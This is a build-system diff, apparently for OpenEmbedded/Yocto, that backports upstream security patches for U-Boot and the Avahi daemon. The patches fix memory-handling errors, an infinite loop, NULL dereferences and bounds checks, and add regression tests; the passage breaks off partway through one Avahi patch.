+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
@@ -0,0 +1,114 @@
+From 5749faa3d6837d6dbaf2119fc3ec49a326690c8f Mon Sep 17 00:00:00 2001
+From: Tom Rini <trini@konsulko.com>
+Date: Tue, 21 Jan 2020 11:53:38 -0500
+Subject: [PATCH] cmd/gpt: Address error cases during gpt rename more correctly
+
+New analysis by the tool has shown that we have some cases where we
+weren't handling the error exit condition correctly. When we ran into
+the ENOMEM case we wouldn't exit the function and thus incorrect things
+could happen. Rework the unwinding such that we don't need a helper
+function now and free what we may have allocated.
+
+Fixes: 18030d04d25d ("GPT: fix memory leaks identified by Coverity")
+Reported-by: Coverity (CID: 275475, 275476)
+Cc: Alison Chaiken <alison@she-devel.com>
+Cc: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+Cc: Jordy <jordy@simplyhacker.com>
+Signed-off-by: Tom Rini <trini@konsulko.com>
+Reviewed-by: Simon Goldschmidt <simon.k.r.goldschmidt@gmail.com>
+
+CVE: CVE-2020-8432
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/5749faa3d6837d6dbaf2119fc3ec49a326690c8f]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ cmd/gpt.c | 47 ++++++++++++-----------------------------------
+ 1 file changed, 12 insertions(+), 35 deletions(-)
+
+diff --git a/cmd/gpt.c b/cmd/gpt.c
+index 0c4349f4b2..964702bad4 100644
+--- a/cmd/gpt.c
++++ b/cmd/gpt.c
+@@ -633,21 +633,6 @@ static int do_disk_guid(struct blk_desc *dev_desc, char * const namestr)
+ }
+
+ #ifdef CONFIG_CMD_GPT_RENAME
+-/*
+- * There are 3 malloc() calls in set_gpt_info() and there is no info about which
+- * failed.
+- */
+-static void set_gpt_cleanup(char **str_disk_guid,
+- disk_partition_t **partitions)
+-{
+-#ifdef CONFIG_RANDOM_UUID
+- if (str_disk_guid)
+- free(str_disk_guid);
+-#endif
+- if (partitions)
+- free(partitions);
+-}
+-
+ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ char *name1, char *name2)
+ {
+@@ -655,7 +640,7 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ struct disk_part *curr;
+ disk_partition_t *new_partitions = NULL;
+ char disk_guid[UUID_STR_LEN + 1];
+- char *partitions_list, *str_disk_guid;
++ char *partitions_list, *str_disk_guid = NULL;
+ u8 part_count = 0;
+ int partlistlen, ret, numparts = 0, partnum, i = 1, ctr1 = 0, ctr2 = 0;
+
+@@ -697,14 +682,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ /* set_gpt_info allocates new_partitions and str_disk_guid */
+ ret = set_gpt_info(dev_desc, partitions_list, &str_disk_guid,
+ &new_partitions, &part_count);
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ if (!strcmp(subcomm, "swap")) {
+ if ((strlen(name1) > PART_NAME_LEN) || (strlen(name2) > PART_NAME_LEN)) {
+@@ -766,14 +745,8 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ * Even though valid pointers are here passed into set_gpt_info(),
+ * it mallocs again, and there's no way to tell which failed.
+ */
+- if (ret < 0) {
+- del_gpt_info();
+- free(partitions_list);
+- if (ret == -ENOMEM)
+- set_gpt_cleanup(&str_disk_guid, &new_partitions);
+- else
+- goto out;
+- }
++ if (ret < 0)
++ goto out;
+
+ debug("Writing new partition table\n");
+ ret = gpt_restore(dev_desc, disk_guid, new_partitions, numparts);
+@@ -795,10 +768,14 @@ static int do_rename_gpt_parts(struct blk_desc *dev_desc, char *subcomm,
+ }
+ printf("new partition table with %d partitions is:\n", numparts);
+ print_gpt_info();
+- del_gpt_info();
+ out:
+- free(new_partitions);
+- free(str_disk_guid);
++ del_gpt_info();
++#ifdef CONFIG_RANDOM_UUID
++ if (str_disk_guid)
++ free(str_disk_guid);
++#endif
++ if (new_partitions)
++ free(new_partitions);
+ free(partitions_list);
+ return ret;
+ }
diff --git a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
index 613e3161fb..8234b86162 100644
--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-bsp/u-boot/u-boot-common.inc b/meta/recipes-bsp/u-boot/u-boot-common.inc
index 4a17894c49..91fe08966b 100644
--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,10 +14,13 @@ PE = "1"
# repo during parse
SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
file://remove-redundant-yyloc-global.patch \
+ file://CVE-2020-8432.patch \
+ file://CVE-2020-10648-1.patch \
+ file://CVE-2020-10648-2.patch \
"
-
+
S = "${WORKDIR}/git"
B = "${WORKDIR}/build"
do_configure[cleandirs] = "${B}"
diff --git a/meta/recipes-bsp/u-boot/u-boot-tools.inc b/meta/recipes-bsp/u-boot/u-boot-tools.inc
index 8ae290acc6..4ed936a70d 100644
--- a/meta/recipes-bsp/u-boot/u-boot-tools.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-tools.inc
@@ -23,6 +23,21 @@ SED_CONFIG_EFI_armeb = ''
SED_CONFIG_EFI_aarch64 = ''
do_compile () {
+ # Yes, this is crazy. If you build on a system with git < 2.14 from scratch, the tree will
+ # be marked as "dirty" and the version will include "-dirty", leading to a reproducibility problem.
+ # The issue is the inode count for Licnses/README changing due to do_populate_lic hardlinking a
+ # copy of the file. We avoid this by ensuring the index is updated with a "git diff" before the
+ # u-boot machinery tries to determine the version.
+ #
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""
+ # build$ ln ../git/
+ # build$ ln ../git/README ../foo
+ # build$ ../git/scripts/setlocalversion ../git
+ # ""-dirty
+ # (i.e. creating a hardlink dirties the index)
+ cd ${S}; git diff; cd ${B}
+
oe_runmake -C ${S} sandbox_defconfig O=${B}
# Disable CONFIG_CMD_LICENSE, license.h is not used by tools and
diff --git a/meta/recipes-bsp/v86d/v86d_0.1.10.bb b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
index a8df80fdd6..e614de0c48 100644
--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "User support binary for the uvesafb kernel module"
HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
+DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
# the copyright info is at the bottom of README, expect break
LICENSE = "GPLv2"
diff --git a/meta/recipes-connectivity/avahi/avahi.inc b/meta/recipes-connectivity/avahi/avahi.inc
index 6acedb5412..e1dfc7a861 100644
--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
file://fix-CVE-2017-6519.patch \
+ file://CVE-2021-3468.patch \
+ file://CVE-2023-1981.patch \
+ file://CVE-2023-38469-1.patch \
+ file://CVE-2023-38469-2.patch \
+ file://CVE-2023-38470-1.patch \
+ file://CVE-2023-38470-2.patch \
+ file://CVE-2023-38471-1.patch \
+ file://CVE-2023-38471-2.patch \
+ file://CVE-2023-38472.patch \
+ file://CVE-2023-38473.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/avahi_0.7.bb b/meta/recipes-connectivity/avahi/avahi_0.7.bb
index f6e3afb24e..0df44bffbe 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
inherit update-rc.d systemd useradd
+# Issue only affects Debian/SUSE, not us
+CVE_CHECK_WHITELIST += "CVE-2021-26720"
+
PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
LICENSE_libavahi-gobject = "LGPLv2.1+"
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
new file mode 100644
index 0000000000..638a1f6071
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
+From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
+From: Riccardo Schirone <sirmy15@gmail.com>
+Date: Fri, 26 Mar 2021 11:50:24 +0100
+Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
+ client_work
+
+If a client fills the input buffer, client_work() disables the
+AVAHI_WATCH_IN event, thus preventing the function from executing the
+`read` syscall the next times it is called. However, if the client then
+terminates the connection, the socket file descriptor receives a HUP
+event, which is not handled, thus the kernel keeps marking the HUP event
+as occurring. While iterating over the file descriptors that triggered
+an event, the client file descriptor will keep having the HUP event and
+the client_work() function is always called with AVAHI_WATCH_HUP but
+without nothing being done, thus entering an infinite loop.
+
+See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
+
+Upstream-Status: Backport
+CVE: CVE-2021-3468
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ avahi-daemon/simple-protocol.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
+index 3e0ebb11..6c0274d6 100644
+--- a/avahi-daemon/simple-protocol.c
++++ b/avahi-daemon/simple-protocol.c
+@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
+ }
+ }
+
++ if (events & AVAHI_WATCH_HUP) {
++ client_free(c);
++ return;
++ }
++
+ c->server->poll_api->watch_update(
+ watch,
+ (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..1209864402
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
+Backport of:
+
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_host_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
+ char *n, *t;
+@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_service_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
+ Client *client;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..12dad9ef6f
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-core/rr.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/rr.c
++++ avahi-0.7/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+ case AVAHI_DNS_TYPE_TXT: {
+
+ AvahiStringList *strlst;
++ size_t used = 0;
+
+- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+ if (strlst->size > 255 || strlst->size <= 0)
+ return 0;
+
++ used += 1+strlst->size;
++ if (used > AVAHI_DNS_RDATA_MAX)
++ return 0;
++ }
++
+ return 1;
+ }
+ }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..a62c718ebe
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ uint32_t cookie;
+ struct timeval tv;
+ AvahiAddress a;
++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++ AvahiStringList *txt = NULL;
++ int r;
+
+ simple_poll = avahi_simple_poll_new();
+ poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+ printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+
++ memset(rdata, 1, sizeof(rdata));
++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++ assert(r >= 0);
++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++ assert(error == AVAHI_ERR_INVALID_RECORD);
++ avahi_string_list_free(txt);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..82fb1ab40b
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c | 2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain-test.c
++++ avahi-0.7/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+ avahi_free(s);
+
++ printf("%s\n", s = avahi_normalize_name_strdup("."));
++ avahi_free(s);
++
++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++ "}.?.?.?.}.=.?.?.}");
++ assert(s == NULL);
++
+ printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+ printf("%i\n", avahi_domain_equal("A", "a"));
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+ }
+
+ if (!empty) {
+- if (size < 1)
++ if (size < 2)
+ return NULL;
+
+ *(r++) = '.';
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..403ed6fd6a
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+ #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+ #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+ #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+ #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+ } else
+ empty = 0;
+
+- avahi_escape_label(label, strlen(label), &r, &size);
++ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++ return NULL;
+ }
+
+ return ret_s;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..c8d6a66174
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+- char *hn = NULL;
++ char label_escaped[AVAHI_LABEL_MAX*4+1];
++ char label[AVAHI_LABEL_MAX];
++ char *hn = NULL, *h;
++ size_t len;
++
+ assert(s);
+
+ AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
+- hn[strcspn(hn, ".")] = 0;
++ h = hn;
++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++ avahi_free(h);
++ return AVAHI_ERR_INVALID_HOST_NAME;
++ }
++
++ avahi_free(h);
+
+- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+- avahi_free(hn);
++ h = label_escaped;
++ len = sizeof(label_escaped);
++ if (!avahi_escape_label(label, strlen(label), &h, &len))
++ return AVAHI_ERR_INVALID_HOST_NAME;
++
++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+- }
+
+ withdraw_host_rrs(s);
+
+ avahi_free(s->host_name);
+- s->host_name = hn;
++ s->host_name = avahi_strdup(label_escaped);
++ if (!s->host_name)
++ return AVAHI_ERR_NO_MEMORY;
+
+ update_fqdn(s);
+
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..a789b144ed
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
